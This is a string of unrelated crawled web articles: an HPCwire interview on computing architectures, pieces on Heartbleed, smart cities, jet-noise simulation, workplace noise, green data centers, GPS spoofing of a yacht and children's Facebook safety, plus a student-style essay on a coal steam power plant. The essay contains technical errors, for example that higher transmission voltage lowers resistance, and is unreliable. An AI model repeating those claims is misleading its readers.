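    return out

# "One instruction": the same computation expressed as a single fused
# array expression, dispatched to optimized vector machine code.
def saxpy_vector(a, x, y):
    return a * x + y

x = np.array([1.0, 2.0, 3.0])
y = np.array([0.5, 0.5, 0.5])
assert np.allclose(saxpy_loop(2.0, x, y), saxpy_vector(2.0, x, y))
```

The fused form does less instruction issue per element, which is the same power-and-performance argument made above, only at the hardware level.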
HPCwire: In order to be successful, do you think new computing paradigms need to leverage existing eco-structures like Linux and Windows?
Wallach: Absolutely. As I said before, new languages mean higher costs and lower productivity. In VC deals, whenever I hear that you have to program in a new language to make it work, I turn it down.
With new computing paradigms, you get several benefits when they leverage existing eco-structures like Linux and Windows. First off, they are more easily accepted in the marketplace. If I'm the data center manager, I don't have to hire anyone new or have training for a new eco-structure. No need to program in OCCAM, for example. I call programs that don't take into consideration legacy systems and that are obscenely difficult to integrate "pornographic" programs — you can't always describe them exactly, but you know them when you see them. In 1984, I converted a FORTRAN program from CDC to ANSI FORTRAN to see what they were doing, and it was awful. In the contemporary world, CUDA is the new pornographic programming language.
In addition, Windows and Linux allow for the adoption of related technologies from other industries without changing the programming environment. Industry innovators such as the researchers at Lawrence Berkeley National Laboratory believe, for example, that future supercomputers will use the processors found in cell phones and other hand-held devices. Why? Because they use so little energy and have proven that they can handle sophisticated tasks (October 2009, IEEE Spectrum: "Low-Power Supercomputers"). It is easy for manufacturers to build chips designed for specific HPC applications, just as they build different chips for each smartphone brand. Chip manufacturers will also provide the software — compilers, debuggers, profiling tools, even complete Linux operating systems — tailored to each specific chip they sell, which will make the new systems easy to integrate into a current environment.
HPCwire: Last year in HPCwire you said the future of HPC involves improved software, in particular more widespread use of PGAS languages and optical interconnects. Is this still the case?
Wallach: Yes. I believe the need for optical interconnects increases as we build large systems. The efficiency of scaling in parallel processing has to do with bandwidth and latency. Optical interconnects are much more efficient in terms of speed and power as compared to copper. PGAS (partitioned global address space) languages allow programmers a global view of their dataset and are much more efficient. PGAS languages also make it much easier to program highly parallel systems — they are much better than MPI.
HPCwire: Speaking of software, where is Convey on its development of different software personalities?
Wallach: We are on track with our development of personalities. Convey's personalities are application architectures and instruction sets that support a wide array of application-specific solutions. Rather than develop hundreds of unique applications, we are creating a manageable number of personalities that can be leveraged in hundreds of different ways. We've shipped a range of different personalities for different customers, and we've got several others in development.
In the end, we anticipate developing around a dozen different core personalities. This is consistent with what leading researchers have determined, also. For example, in the study published by the University of California at Berkeley, "The Landscape of Parallel Computing Research: A View from Berkeley," researchers define what they call MOTIFs, or computer application structures, for HPC. They describe 13 computer application structures on the Y axis, with the X axis representing a particular application and how it uses that structure. Berkeley's view is consistent with ours: there are approximately a dozen different personalities that cover the full spectrum of computing. In our development, we add a third element to the equation, the memory system, and see this as a three-dimensional grid. In this case, optimal performance requires either a unity-stride memory system (accessing sequential elements; dense data), a highly interleaved one (accessing non-sequential elements across multiple independently accessible memory banks; sparse data), or a "smart" memory system (PIM, performing specific operations in the memory system; thread-based).
We are on track to have personalities with memory structure and instruction sets with these MOTIFs, which is where we believe computing is going. For the HC-1, we ultimately anticipate 13 MOTIFs — but some will use the same personality.
HPCwire: Convey has just started shipping production units, can you tell us about the company’s early customers and how they’re using the HC-1?
Wallach: Early applications for the HC-1 follow the classic profile of HPC applications: signal-image processing, computer simulations, bioinformatics, and other applications we can’t discuss at this time. We have HC-1s going into the world’s leading research labs, all of which we will talk about during SC09 at our booth.
You can catch up with Steve Wallach during SC09, where he is participating in a talk on “HPC Architectures: Future Technologies and Systems” from 1:30-2:00 p.m. on Thursday (Rm. E143-144); or at Convey’s booth (#2589). | <urn:uuid:2361415a-df63-40d7-a8a0-bafb1a8e8bf0> | CC-MAIN-2017-09 | https://www.hpcwire.com/2009/11/16/d_j_vu_all_over_again/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00628-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.948445 | 2,573 | 2.625 | 3 |
By now you've likely heard about the Heartbleed bug, a critical vulnerability that exposes potentially millions of passwords to attack and undermines the very security of the Internet. Because the flaw exists in OpenSSL—which is an open source implementation of SSL encryption—many will question whether the nature of open source development is in some way at fault. I touched base with security experts to get their thoughts.
Closed vs. Open Source
First, let’s explain the distinction between closed source and open source. Source refers to the source code of a program—the actual text commands that make the application do whatever it does.
Closed source applications don’t share the source code with the general public. It is unique, proprietary code created and maintained by internal developers. Commercial, off-the-shelf software like Microsoft Office and Adobe Photoshop are examples of closed source.
Open source, on the other hand, refers to software where the source code is available to the public. Open source projects are generally collaborative efforts because any developer is free to review the code, edit or enhance it, or add features. Popular examples of open source software include Linux, the Apache Web server, and OpenSSL.
Open source (in)security
When anyone is free to view the source code, and any developer can submit changes to the open source project, there are potential security concerns. Without properly vetting the developers, there is no way to know what—if any—secure development practices are being used, and the possibility exists for a malicious developer to intentionally introduce a vulnerability like Heartbleed for the express purpose of exposing the software to attack.
Does that mean that open source tools are inherently insecure, or less secure, than their closed source cousins?
“An argument could be made that the collaborative nature of open source software development compounds the challenge of ensuring security is considered throughout the software life cycle,” David Shearer, CISSP, PMP, and Chief Operating Officer of (ISC)2, said in a statement sent to PCWorld.
The security implications of what should be a simple diagnostic capability in OpenSSL are a prime example. According to Shearer, "One could go as far as to say that we may be heading toward a time where some of the key security architecture components that are available as open source software may need to be more closely managed and monitored."
But while it's true that there are some security concerns unique to the collaborative nature of open source and to having the source code open to the general public, there are also ways that open source strengthens security.
"The advantage to open source is that it is so transparent that we can detect and fix quickly,” TK Keanini, CTO of Lancope says.
The truth is insecure code is not an open source vs. closed source debate. In spite of much tighter control of software development, and management of source code, crucial security flaws are still frequently discovered in commercial software that customers pay a lot of money for.
“Finger pointing at the open source development communities or persons or processes isn't going to fix the problem,” notes Andrew Storms, senior director of DevOps for CloudPassage. “Open source software along with commercial software will always have bugs.”
So, while it's natural to look for a scapegoat for a flaw of this magnitude, it would be foolish to dismiss the many benefits of open source in the name of security.
This story, "Is open source to blame for the Heartbleed bug?" was originally published by PCWorld. | <urn:uuid:cab03f1d-eb1e-48b4-ab90-0ee360a64c42> | CC-MAIN-2017-09 | http://www.csoonline.com/article/2142103/security/is-open-source-to-blame-for-the-heartbleed-bug.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00152-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.937828 | 735 | 3 | 3 |
Let's start with an example. I am going to pick Road-Usage Charging (RUC) as an example of a Smart solution, but in fact there are many solutions that exhibit the principle I am going to describe. Here are some easy steps:
- RUC systems are deployed to automate the collection of tolls for road segments, bridges, tunnels, and so forth. Local governments like them because they are often sources of new revenue at relatively low cost. The business cases for these systems have very high ROI, and the investment is often recovered in less than one year.
- RUC systems are relatively simple as IT systems. The basic challenge is to recognize vehicles as they pass through or under a gate. This can be based on an RFID device (e.g., the E-ZPass system on the east coast of the United States), on license plate recognition (e.g., the City of Stockholm), or on a combination of the two (e.g., Singapore). This identification is mapped to an account, and a charge transaction is made against the account. Not too difficult in principle.
- However, what we have also created here is a stream of high-resolution data on the movement of vehicles past well-defined locations in an urban area: hundreds of thousands of touch points per day, generated for free and mainly regarded as a kind of waste product of the system's business purpose of generating transactional charges.
- But there is information in that data, and in 2007 the Singapore Land Transport Agency (LTA), which was an early adopter of RUC, asked IBM whether that data could be used to predict incipient congestion in districts within the city. The mathematicians in IBM Research started looking at the data, and although it did not provide complete coverage of the city, they were able to detect patterns of traffic density that are leading indicators for the onset of congestion. In fact, they were able to build predictive models that, with high accuracy, give the LTA as much as one hour of warning of the danger of congestion. An hour is sufficient time for the LTA traffic managers to change the timing of the traffic lights or to change the tolling for specific roads. The latter is a unique feature of the Singapore RUC.
- So here is the Smart Principle: 1) A system is deployed, often for transactional purposes. 2) A free by-product of the system is a dense stream of data about some aspect of the real-world. 3) This stream of data contains information about critical insights on what is going on in the real-world that can be extracted, in "real-time", by applying on-line analytical processing. 4) These insights enable the city managers to take better decisions about how to manage the operation of the city's infrastructure.
- RUCs are a great example, but in fact there are many such systems for energy, transportation, buildings, public safety and many other areas of city management. This accumulation of such systems in many cities over recent years creates what I call the Urban Digital Foundation - that sea of data, free data, that we can now tap for a very broad understanding of how to build a Smarter City. This is not to say that we never need to install new sensors. Water in particular is a domain that is strongly under-instrumented.
- See this IBM video (http://www.youtube.com/watch?v=sfEbMV295Kk) that describes a Smarter Planet view of the Internet of Things and illustrates this beautifully.
- The absence of this Urban Digital Foundation is what differentiates a potential Smarter City from others. In part it has to do with a rich communications infrastructure, but it largely has to do with the creation of these cost-free streams of data. When people challenge me to suggest what we could do to help some of the sprawling mega-cities such as Calcutta, my response is that there is little we can do until this Urban Digital Foundation is established. Without data there is no Smarter City.
That's all for now. Stay tuned. | <urn:uuid:69d85cbf-d105-4b96-afe8-c6401f48fa09> | CC-MAIN-2017-09 | https://www.ibm.com/developerworks/community/blogs/1d9bfc5f-e173-4598-aabc-e62b832282fa/entry/the_smart_principle_and_the_urban_digital_infrastructure1?lang=en | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00624-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961886 | 833 | 2.890625 | 3 |
Stanford researchers said this week they had used a supercomputer with more than one million computing cores to predict the noise generated by a supersonic jet engine.
The researchers used the 1,572,864 processor Sequoia IBM Bluegene/Q system at Lawrence Livermore National Laboratories to run complex simulations that determined the physics of noise that are often impossible in the harsh exhaust environment of massive and powerful jet engines.
"The exhausts of high-performance aircraft at takeoff and landing are among the most powerful human-made sources of noise. For ground crews, even for those wearing the most advanced hearing protection available, this creates an acoustically hazardous environment. To the communities surrounding airports, such noise is a major annoyance and a drag on property values. Understandably, engineers are keen to design new and better aircraft engines that are quieter than their predecessors. New nozzle shapes, for instance, can reduce jet noise at its source, resulting in quieter aircraft," Stanford stated.
The researchers noted that with the advent of massive supercomputers boasting hundreds of thousands of computing cores, engineers have been able to model jet engines and the noise they produce with accuracy and speed. Such fluid dynamics simulations test all aspects of a supercomputer. The waves propagating throughout the simulation require a carefully orchestrated balance between computation, memory and communication. Supercomputers like Sequoia divvy up the complex math into smaller parts so they can be computed simultaneously. The more cores you have, the faster and more complex the calculations can be, the researchers said.
"And yet, despite the additional computing horsepower, the difficulty of the calculations only becomes more challenging with more cores. At the one-million-core level, previously innocuous parts of the computer code can suddenly become bottlenecks," the researchers stated.
Check out these other hot stories: | <urn:uuid:a8433d22-2a89-4e3e-9116-edc66bac3f85> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2223944/data-center/stanford-consumes-million-core-supercomputer-to-spawn-supersonic-noise-forecast.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00500-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.93417 | 369 | 3.625 | 4 |
Since: BlackBerry 10.0.0
A class representing different input masking modes.
This class represents different input masking modes. You can use input masking to prevent characters that are typed in a text field from appearing. When input masking is enabled, typed characters appear as asterisks (*).
By default, users can toggle input masking on or off by using a toggle box inside the text control. You can prevent this by using either MaskedNotTogglable or NotMaskedNotTogglable.
Public Types Index
Specifies different masking modes.
- Default (0): The default masking mode.
- Masked (1): Indicates that masking is turned on.
- NotMasked (2): Indicates that masking is turned off.
- MaskedNotTogglable (3): Indicates that masking is turned on and that users can't toggle the masking mode.
- NotMaskedNotTogglable (4): Indicates that masking is turned off and that users can't toggle the masking mode.
In this steam power plant we use coal (sub-bituminous), which has less moisture, burns efficiently, and is easily available in Sindh areas such as Thar and Lakhra.
SINDH: The Sindh province has total coal resources of 184 billion tonnes. The quality of coal is mostly lignite-B to sub-bituminous A-C.
THAR: A large coal-field, having a resource potential of about 175 billion tonnes, has been discovered at Thar in the eastern part of the province, about 400 km South East of Karachi.
BOILER: We have selected a Benson water-tube boiler instead of a fire-tube boiler to minimize pressure loss.
Boiler pressure: 12 MPa

Superheater temperature: 600 °C

Turbine exhaust temperature: 90 °C

Mass flow rate of steam: 150 kg/s
Steam Boiler Efficiency
The percentage of the total heat supplied by the fuel (coal) that is exported by the outlet steam is called steam boiler efficiency.

It encompasses thermal efficiency, combustion efficiency, and fuel-to-steam efficiency. Steam boiler efficiency depends upon the size of the boiler used. A typical steam boiler efficiency is 80% to 88%. In practice, losses occur, such as incomplete combustion, radiation loss from the boiler's surrounding walls, and defective combustion gas; the efficiency of a steam boiler reflects these losses.
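As a sketch of the direct ("input-output") efficiency method, using the 150 kg/s steam flow from the spec above and otherwise assumed round-number enthalpies and fuel figures (illustrative values, not measurements from any real plant):

```python
# Direct ("input-output") method: heat absorbed by the steam divided by
# heat released by the fuel. All values marked "assumed" are illustrative.

m_steam = 150.0      # steam flow, kg/s (from the spec above)
h_steam = 3600.0     # superheated steam enthalpy, kJ/kg (assumed, ~12 MPa / 600 C)
h_feed = 990.0       # feedwater enthalpy, kJ/kg (assumed)

m_fuel = 26.0        # coal firing rate, kg/s (assumed)
gcv = 18000.0        # gross calorific value of sub-bituminous coal, kJ/kg (assumed)

heat_to_steam = m_steam * (h_steam - h_feed)   # kJ/s
heat_from_fuel = m_fuel * gcv                  # kJ/s

efficiency = heat_to_steam / heat_from_fuel
print(f"boiler efficiency ~ {efficiency:.1%}")  # ~83.7%, in the typical 80-88% band
```

Changing the assumed firing rate or coal quality moves the result directly, which is why the direct method is usually cross-checked against a loss-by-loss (indirect) calculation.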
Number of closed feedwater heaters: 2

Number of open feedwater heaters: 1

Number of reheaters: 3
Today, most of the electricity produced throughout the world comes from steam power plants. A steam power plant continuously converts the energy stored in fossil fuels (coal, oil, natural gas) into shaft work and ultimately into electricity. Steam has the advantage that it can be raised from water, which is available in abundance, does not react much with the materials of the plant's equipment, and is stable at the temperatures required in the plant.
Energy released by burning fuel (Q1) is transferred to water in the boiler, and steam (H2O(g)) is generated at high pressure and temperature. The steam expands in the turbine (T) to a low pressure to produce shaft work WT. Steam leaving the turbine is condensed into water in the condenser (C).

In the condenser, cooling water from a river or the sea circulates, carrying away the heat released during condensation (Q2). The water (condensate) is fed back to the boiler by the pump (P), requiring power WP, and the cycle repeats. Since the working substance (water) undergoes a cyclic process, there is no change in its internal energy over the cycle: ∮ dE = 0.
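Using the plant figures quoted earlier (superheater at 600 °C, turbine exhaust at 90 °C), here is a quick sketch of this cycle energy balance together with its Carnot upper bound; the heat flows Q1 and Q2 below are illustrative assumptions, not plant data:

```python
# Over a complete cycle the working fluid's internal energy is unchanged,
# so the net work is W_net = Q1 - Q2. The Carnot limit bounds the
# efficiency of any cycle operating between these two temperatures.

T_hot = 600.0 + 273.15    # superheater temperature, K (from the spec)
T_cold = 90.0 + 273.15    # turbine exhaust temperature, K (from the spec)
carnot_limit = 1.0 - T_cold / T_hot

Q1 = 500.0                # MW absorbed in the boiler (assumed)
Q2 = 265.0                # MW rejected in the condenser (assumed)
W_net = Q1 - Q2
thermal_eff = W_net / Q1

print(f"Carnot limit:       {carnot_limit:.1%}")   # ~58.4%
print(f"illustrative cycle: {thermal_eff:.1%}")    # 47.0%, below the limit
```

A real Rankine cycle with reheat and feedwater heating lands well below the Carnot bound, which is consistent with the 47% plant efficiency cited later in this abstract.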
A steam power plant is a power station in which the electric generator is steam driven. Water is heated, turns into steam, and spins a steam turbine. After it passes through the turbine, the steam is condensed in a condenser. The greatest variation in the design of steam-electric power plants is due to the different fuel sources. Almost all coal, nuclear, geothermal, and solar thermal electric power plants, waste incineration plants, as well as many natural gas power plants are steam-electric. Natural gas is frequently combusted in gas turbines as well as boilers. The waste heat from a gas turbine can be used to raise steam in a combined cycle plant that improves overall efficiency.

Worldwide, most electric power is produced by steam-electric power plants, which account for about 86% of all electric generation. The only other types of plants that currently make a significant contribution are hydroelectric and gas turbine plants, which can burn natural gas or diesel. Photovoltaic panels, wind turbines, and binary-cycle geothermal plants are also non-steam electric, but currently do not produce much electricity.

Reciprocating steam engines have been used as mechanical power sources since the 18th century, with notable improvements made by James Watt. The very first commercial central electrical generating stations, in New York and London in 1882, also used reciprocating steam engines. As generator sizes increased, turbines eventually took over due to higher efficiency and lower construction cost. By the 1920s any central station larger than a few thousand kilowatts would use a turbine prime mover.

After electricity is generated, it has to be moved to the customers that use it. This involves two basic steps: transmission (moving electricity at high voltages from generating plants to local communities) and distribution (moving power to individual customers).
The transmission system carries electricity from the power plant to local communities, often over long distances. Electricity does not travel easily. Transmission lines have some resistance to the flow of electricity (this is similar to the friction caused by the flow of water in a pipe). This causes them to lose a portion of the electricity they transport. Early in the history of electricity transmission systems energy developers discovered that the higher the voltage in electricity lines, the less resistance and, therefore, the less wasted electricity. That’s why when electricity travels long distances, it is better to have it at higher voltages.
Heat transfer in Steam Generator normally takes place in 3 steps
Economiser: sensible heating in the liquid phase until the water becomes saturated liquid.

Evaporator: phase change by absorbing the latent heat of vaporization.

Superheater: sensible heating of the vapor until it becomes superheated vapor.
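A rough per-kilogram split of the heat duty across those three stages, using assumed round-number properties for ~12 MPa operation (approximations, not steam-table lookups):

```python
# Heat absorbed per kg of working fluid in each steam-generator stage.
# Property values are assumed round numbers for ~12 MPa operation.

cp_water = 4.6     # mean cp of compressed liquid water, kJ/(kg*K) (assumed)
cp_steam = 3.0     # mean cp of superheated steam, kJ/(kg*K) (assumed)
h_fg = 1190.0      # latent heat of vaporization near 12 MPa, kJ/kg (assumed)

T_feed = 230.0     # feedwater inlet temperature, C (assumed)
T_sat = 325.0      # saturation temperature near 12 MPa, C (approximate)
T_super = 600.0    # superheater outlet temperature, C (from the spec)

q_economiser = cp_water * (T_sat - T_feed)     # sensible heat, liquid phase
q_evaporator = h_fg                            # latent heat, phase change
q_superheater = cp_steam * (T_super - T_sat)   # sensible heat, vapor phase

q_total = q_economiser + q_evaporator + q_superheater
for name, q in [("economiser", q_economiser),
                ("evaporator", q_evaporator),
                ("superheater", q_superheater)]:
    print(f"{name}: {q:7.1f} kJ/kg ({q / q_total:.0%} of total)")
```

Even with these rough numbers, the evaporator carries the largest share of the duty, which is why boiler heat-transfer surface is dominated by the evaporator section.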
Flue gas is the gas exiting to the atmosphere via a flue, which is a pipe or channel for conveying exhaust gases from a fireplace, oven, or steam generator. Quite often, flue gas refers to the combustion exhaust gas produced at power plants. Its composition depends on what is being burned, but it will usually consist mostly of nitrogen (typically more than two-thirds) derived from the combustion air, carbon dioxide (CO2), and water vapor, as well as excess oxygen (also derived from the combustion air). It further contains a small percentage of pollutants, such as particulate matter, nitrogen oxides, and sulfur oxides.
For environmental safety, the ash produced takes two forms: the wet (bottom) ash settles out, while the fly ash and flue gases pass through the economizer and on to the electrostatic precipitator, which directs them toward the chimney. In the chimney, a water spray captures these gases and particulates so that they are not released into the environment.

If these gases escape into the environment, they can cause many problems, such as ozone depletion.
Coal-fired thermal power plants meet the growing energy demand, and hence special attention must be given to defining a strategy for the optimization of these systems. The energy analysis presented for a coal-fired thermal power plant has provided information on the irreversibilities of each process.
This steam power plant gives us an efficiency of 47%, is friendly to the environment, and has a capacity of 249 MW. In Sindh, a plant of this type is being constructed by a Chinese company; it will be fully built by next year and will have the capacity to supply an entire city.
By Ann Silverthorn
According to a recent end-user survey, which included a section on "green" initiatives, nearly three-fourths of the respondents have an interest in adopting a green data-center initiative, yet only one in seven has successfully done so. For the purposes of the study, a green data center was defined as one having increased efficiency in energy usage, power consumption, and space utilization, as well as a reduction in polluting energy sources.
Conducted by Ziff Davis on behalf of Symantec, the study surveyed 800 data-center managers across 14 countries, most of which were Global 2000 organizations and other large companies.
In the US, only about one-third of the companies have adopted green policies. However, many US companies are making progress with the Green Grid, which is a consortium of IT vendors and users seeking to lower the overall consumption of power in data centers. The organization is chartered to develop platform-neutral standards, measurement methods, processes, and new technologies to improve energy efficiency.
Green Grid board members include AMD, APC, Dell, Hewlett-Packard, IBM, Intel, Microsoft, Rackable Systems, Spray Cool, Sun, and VMware. Contributing members include nearly 30 vendors, including storage vendors such as Copan and Pillar Data Systems. General members, which number 75, include storage vendors such as Nexsan, Sepaton, and Storwize.
In the Symantec survey, 85% of the respondents said energy efficiency is at least a moderate priority in their data centers, with 15.5% citing it as a critical priority.
Marty Ward, director of NetBackup product marketing at Symantec, says the numbers are not surprising because, "a lot of thought is being put into it and not enough action." However, Ward is encouraged that almost three-fourths of the respondents are at least thinking about going green.
When considering approaches to making data centers greener, managers have many choices in both software and hardware. They may even decide on an entire data-center redesign. According to Ward, technologies such as data de-duplication and creating a tiered storage architecture are examples of technologies that can dramatically reduce energy consumption.
In addition, there are a variety of projects that constitute green policies (see figure, below).
Reducing the data footprint | <urn:uuid:cede9f89-8448-40b0-b715-ddae770dad93> | CC-MAIN-2017-09 | http://www.infostor.com/index/articles/display/312697/articles/infostor/top-news/survey-reveals-green-initiatives-or-lack-thereof.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00268-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961527 | 484 | 2.625 | 3 |
Solar Eclipse from Space
/ March 12, 2013
The latest transmissions from NASA's Solar Dynamics Observatory (SDO), which took off in 2010 for its five-year mission to observe solar activity, shows the sun partially blocked from view by the Earth -- and the moon.
Such solar eclipses will be regular occurrences for the next three weeks, cnet.com reported, when the Earth blocks the SDO's view of the sun for a period of time each day.
The photo above was taken on Monday, March 11, and shows the moon crossing in front of the sun.
Photo courtesy of NASA/SDO | <urn:uuid:75969494-d65c-426c-9cc2-ca7058650aa5> | CC-MAIN-2017-09 | http://www.govtech.com/photos/Photo-of-the-Week-Solar-Eclipse-from-Space.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00620-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.943128 | 129 | 3.078125 | 3 |
Development of Smart Cities
Smart cities are slowly becoming a reality on a global level, but in those cities determined to implement the necessary smart infrastructure, connected technology is often very rapidly reshaping industrial, commercial and residential environments. Municipalities adopting smart technology both to save money and to improve the lives of residents believe that the initial capital outlay will show positive returns, drawing leading businesses to the area and improving overall local administration. In some places, the move towards smart cities is far more dramatic: Australia has recently announced a $50 million R&D program aimed at inspiring smart city innovations, a four-year plan intended to improve life in cities and suburbs through technology and open data, and with a backing of $31 million, Scotland’s seven major cities are banding together to develop several smart city projects.
The Future of Smart Cities
In a recent exploration of how IoT tech is likely to transform cities at the Gartner Symposium/ITxpo 2016, Gartner analysts suggested that by 2020 climate change, resilience and sustainability KPIs will feature in half of all smart city objectives. Says Bettina Tratz-Ryan, research vice president at Gartner, “With the Horizon 2020 goals of energy efficiency, carbon emission reductions and renewable energy in mind, many cities in Europe have launched energy sustainability, resource management, social inclusion and community prosperity initiatives.” Tratz-Ryan further suggests that thanks to Internet of Things (IoT) technology’s ability to analyze data contextually, the development of smart city execution can be accelerated.
Sensors are already at the heart of smart cities, and Gartner predicts that next year approximately 380 million connected things will be in use in cities helping meet climate change and sustainability goals; by 2020 we can expect a spectacular increase to 1.39 billion connected things. Says Tratz-Ryan, “The uptake of ride sharing, the electrification of public transportation, the support infrastructure for e-vehicles and congestion charging for combustion engines, all of those examples are driving cleaner air, producing fewer GHG emissions and saving energy, while improving the noise levels and ambiance on streets.”
We can also expect to see intelligent streetlights helping cities meet energy targets as well as BMS systems that could potentially halve energy consumption through better management of lighting, heating, and cooling.
The Benefits of Smart City Living
On a more personal level, the benefits of living in a smart city sometimes seem distant, and we’re not likely to notice the small changes taking place right away. However, once the coordination of smart devices is properly implemented, with lighting, traffic signaling and updating, venue and event synchronization, and the like in place, the results could be dramatic. Today, some of the most recognized benefits of well-functioning smart cities include healthier communities, smart development, and sustainability.
(Image Source: http://www.libelium.com)
For the cities committed to improving public transport networks and Wi-Fi accessibility, results of reduced pollution and obesity levels are being reported along with citizens claiming a greater sense of engagement with their towns. And those cities implementing IoT and smart city networks are finding it easier to attract new residents thanks to cheaper living costs through both lowered utility and transport bills as well as improved social and cultural energy thanks not only to cleaner air but a burgeoning vibrant city life. Businesses, too, prefer cities with smart infrastructure thanks to reduced operating costs and it’s expected that the spending by the global business community towards incorporating smart technologies into buildings will be in the billions in 2017. Finally, with IoT tech enhancing usage of resources such as fuel, energy, water, and waste, environmental savings and sustainability receive a much-needed advance; IoT-driven smart lighting and water programs are already saving smart cities many millions of dollars each year.
Though some are lucky enough to live already in smart cities, most of us still have a bit of a wait; fortunately, the trend toward government participation and investment in such innovation has already begun.
By Jennifer Klostermann
BEAVERTON, OR--(Marketwire - Dec 5, 2012) - The amounts of sustained noise people are subjected to in everyday life have reached unsafe levels, according to a new report authored by leading sound experts and published today. Building in Sound, developed by Biamp Systems in collaboration with acoustics expert and TED speaker Julian Treasure, reports that everyday noise levels regularly exceed the World Health Organization's (WHO) recommended levels. The study draws clear links between excessive noise and poor acoustics and ill-health, distraction and loss of productivity, and even disruption to educational development.
Drawing on a variety of academic, government and industry body sources, the paper has identified the economic and social impacts noise can have on everyday life -- whether in a city, at work, in a classroom or hospital.
Examples of the sort of noise levels urban populations are regularly exposed to include:
- An air conditioning unit puts out sounds of 55 decibels. At this level, sleep is impaired and the risk of heart disease increases. Yet an average busy office has been recorded at 65 decibels.
- Street traffic has been recorded at 70 decibels. Regular unprotected exposure to the same level of noise can lead to permanent hearing loss.
- The average noise of a motorway is around 85 decibels, the same point at which US Federal Law mandates hearing protection for prolonged exposure.
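Because the decibel scale is logarithmic, gaps that look modest on paper are large in physical terms: every 10 dB adds a factor of ten in sound intensity. A quick back-of-the-envelope check of the figures above (my arithmetic, not the report's):

```python
def intensity_ratio(db_a, db_b):
    """Ratio of sound intensities for two decibel levels (each 10 dB = 10x intensity)."""
    return 10 ** ((db_a - db_b) / 10)

# A motorway at 85 dB carries 1,000 times the sound intensity
# of a 55 dB air conditioner, even though the numbers look close.
print(intensity_ratio(85, 55))  # 1000.0
```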
The study also looks at much needed solutions to the issues -- given that road traffic noise is estimated to cost between 30 and 46 billion Euros a year ($39 and 60 billion USD a year), or 0.4% of GDP in the European Union.1 It calls for an integrated approach to acoustic design that incorporates cutting edge sound technology with a more thoughtful approach to architectural design and construction. Properly executed, managing sound can lead to higher employee productivity and job satisfaction, lower crime rates in urban environments, and increased sales in business.
"Noise is a major threat to our health and productivity -- but until now we have been largely unconscious of its effects because of our obsession with how things look," says Julian Treasure, chairman of The Sound Agency. "We need to start designing with our ears, creating buildings and public spaces that sound as good as they look. If we do that, we can transform the productivity and wellbeing of office workers, patients in hospitals and children in schools, among many others."
"This isn't a call for silence, but an appeal to start considering the effects poorly managed sound can have," says Graeme Harrison, vice president of marketing at Biamp Systems. "The right sound and acoustics can transform education, healthcare and work, but we have to address the problem now because it's only going to become more difficult in the future. We have the technology and expertise to manage the acoustics of new and existing environments, but now's the time to act and build in sound."
The full report and infographic are available for download here.
About Biamp Systems
Biamp Systems is a leading provider of innovative, networked media systems that power the world's most sophisticated audio/video installations. The company is recognized worldwide for delivering high-quality products and backing each product with a commitment to exceptional customer service. Industry collaboration and education lie at the heart of Biamp's philosophy. The company is a founding member of the AVnu Alliance, the industry body dedicated to developing standards for professional-quality networked audio and video systems, and it was the first US manufacturer to certify a networked audio solution as EN 54-16 compliant.
The award-winning Biamp product suite includes the Tesira® media system for digital audio networking, Audia® Digital Audio Platform, Nexia® digital signal processors, Sona™ AEC algorithm and Vocia® Networked Public Address and Voice Evacuation System. Each has its own specific feature set that can be customized and integrated in a wide range of applications, including corporate boardrooms, conference centers, performing arts venues, courtrooms, hospitals, transportation hubs, campuses and multi-building facilities.
Founded in 1976, Biamp is headquartered in Beaverton, Oregon, USA, with additional engineering operations in Brisbane, Australia. For more information on Biamp, please visit www.biamp.com.
About Julian Treasure
Julian Treasure is chairman of The Sound Agency, a UK-based consultancy that helps clients achieve better results by optimising the sound they make in every aspect of business. He is also the author of the book Sound Business, the first map of the exciting new territory of applied sound for business. Mr. Treasure has been widely featured in the world's media and conferences, including TED. His four TED talks have been viewed an estimated four million times. His latest talk is on why architects need to use their ears.
1 SILENCE - Recommendations: Practitioner Handbook for Local Noise Action Plans: European Commission Sixth Framework Programme
A group of students at the University of Texas at Austin built and successfully tested a GPS spoofing device to remotely redirect an $80 million yacht onto a different route, the Houston Chronicle reports. The project, which was completed with the permission of the yacht's owners in the Mediterranean Sea this past June, is explained in the video below.
Because the yacht's crew relies entirely on GPS signal for direction, the students were able to lead the yacht onto a different course without the knowledge of anyone on board. The GPS spoofing device essentially overpowered all other GPS signals until the spoofed signal was the only one the yacht followed. The yacht's navigation system merely recognized it as another signal, so the yacht changed course without setting off any alarms.
The team then used the GPS spoofing device to convince the ship's crew to redirect onto a different route voluntarily. By changing the signal on the spoofing device, the students led the crew to believe that the ship was drifting off-course to the left. In response, the crew steered the ship to the right, thinking that it would get the ship back on course, when it actually brought the ship off course entirely.
GPS spoofing is not very common, but it has already raised concerns with international regulators. As this Economist article points out, satellite spoofing is believed to be responsible for a brief daily GPS outage near the London Stock Exchange. The most likely perpetrator, according to the Economist, is a consumer spoofing device used by a delivery driver or anyone concerned that their employer is tracking their driving route.
These consumer spoofing devices, the sale of which has been banned in the U.S., can still be legally purchased in the UK, and are available for as cheap as $78 (£50).
And, of course, North Korea has already experimented with the technology, reportedly blocking GPS signal in South Korea on several occasions. One such attack launched in 2012 affected 1,016 aircraft and 254 ships.
ZoneAlarm revealed the common behaviours of younger Facebook users that increase their susceptibility to encountering cyberbullying, predators and other security threats.
A ZoneAlarm report examined the online activities of 600 children worldwide, aged between 10-15, who regularly use Facebook. Three activities in particular showed a positive correlation with the occurrence of security threats: children adding Facebook “friends” that may be strangers, playing Facebook games that request access to private account information, and using Facebook late at night.
